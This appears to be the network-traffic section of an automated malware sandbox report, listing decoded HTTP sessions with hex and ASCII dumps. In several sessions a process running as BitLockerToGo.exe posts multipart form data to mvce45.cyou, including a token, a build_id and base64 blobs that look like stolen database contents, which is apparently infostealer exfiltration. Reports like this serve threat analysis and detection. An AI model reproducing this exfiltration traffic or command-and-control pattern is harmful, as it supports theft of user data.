                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:24 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:25 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  17192.168.2.8497412.16.229.162443
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:25 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                  Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:25 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                  X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=179841
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:25 GMT
                                                                                                                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  X-CID: 2
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:25 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  18192.168.2.84974249.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 142457
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------EHCAEGDHJKFHJKFIJKJECont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                                                  Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:28 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  19192.168.2.84974349.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:28 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGD
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 493
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:28 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------CAKKJKKECFIDGDHIJEGDCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:29 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                  20192.168.2.84975240.126.53.18443
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:32 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                  Content-Length: 4722
                                                                                                                                                                                                                                                                                                                  Host: login.live.com
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:32 UTC4722OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:33 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                  Expires: Thu, 21 Nov 2024 14:47:33 GMT
                                                                                                                                                                                                                                                                                                                  P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                  x-ms-route-info: C516_BAY
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: a460c9a1-6bca-4b2d-bb40-578268923b59
                                                                                                                                                                                                                                                                                                                  PPServer: PPV: 30 H: PH1PEPF0001B804 V: 0
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:32 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Length: 10197
